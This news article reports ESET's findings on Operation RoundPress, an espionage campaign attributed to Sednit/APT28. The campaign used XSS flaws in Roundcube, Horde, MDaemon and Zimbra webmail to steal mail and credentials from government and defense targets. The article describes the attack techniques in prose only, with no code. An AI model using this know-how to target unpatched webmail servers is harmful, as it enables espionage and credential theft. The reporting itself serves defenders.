Cybersecurity researchers at ESET have uncovered a sophisticated cyberespionage campaign, codenamed ‘Operation RoundPress’, attributed with medium confidence to the Russia-aligned Sednit group, also known as APT28, Fancy Bear, or Sofacy. The campaign exploits cross-site scripting (XSS) vulnerabilities in widely used webmail servers to exfiltrate sensitive communications from high-value targets.
Sednit is a group tied to Russia’s GRU military intelligence agency and previously implicated in high-profile operations including the 2016 DNC hack, TV5Monde breach, and WADA email leaks.
Most of the victims are government entities and defense companies in Eastern Europe, especially those linked to the ongoing war in Ukraine. Many are involved in manufacturing Soviet-era weapons destined for Ukrainian forces. Additional targets include governments in Africa, Europe, and South America.
Initially identified in 2023, RoundPress began with a focus on exploiting Roundcube webmail servers using the XSS vulnerability CVE-2020-35730. In 2024, the operation significantly expanded its attack surface to include Horde, MDaemon, and Zimbra, with one attack leveraging a zero-day vulnerability (CVE-2024-11182) in MDaemon, which was unknown and unpatched at the time of exploitation.
The primary compromise vector used in Operation RoundPress is spearphishing emails containing malicious payloads that exploit XSS flaws. When recipients open these emails in vulnerable webmail clients, the embedded JavaScript payloads are executed within the context of the email interface, allowing attackers to extract email content, contact lists, and user credentials.
One phishing email sent on September 29, 2023 exploited the CVE-2023-43770 flaw in Roundcube. The email was crafted to appear benign, typically containing news-related text, but triggered the malicious script upon being opened.
In an incident targeting two Ukrainian state-owned defense companies and a Ukrainian civil air transport company observed in November 2024, attackers exploited the then zero-day XSS vulnerability (CVE-2024-11182) in MDaemon, allowing for the theft of sensitive data from Ukrainian state-owned defense firms and a civil air transport company.
Each targeted webmail platform had a tailored JavaScript payload:
-
SpyPress.ROUNDCUBE
-
SpyPress.HORDE
-
SpyPress.MDAEMON
-
SpyPress.ZIMBRA
As for targets using Roundcube webmail, ESET says that in 2023, Sednit used the XSS vulnerability CVE-2020-35730, while in 2024, it switched to CVE-2023-43770. For Zimbra, Sednit uses CVE-2024-27443 (also tracked as ZBUG-3730).
The payloads do not achieve permanent persistence but are reloaded every time the malicious email is opened. Some variants, like SpyPress.ROUNDCUBE, can create Sieve rules, ensuring continued surveillance by automatically forwarding incoming emails to attacker-controlled addresses even after the script stops running.
The SpyPress.MDAEMON payload is capable of bypassing two-factor authentication, ESET said. All payloads attempt to steal login credentials, sometimes using hidden forms or deceptive logout/login screens. Exfiltration is conducted via HTTP POST requests to hardcoded command-and-control (C&C) infrastructure.
“Over the past two years, webmail servers such as Roundcube and Zimbra have been a major target for several espionage groups such as Sednit, GreenCube, and Winter Vivern. Because many organizations don’t keep their webmail servers up to date and because the vulnerabilities can be triggered remotely by sending an email message, it is very convenient for attackers to target such servers for email theft,” ESET has warned.
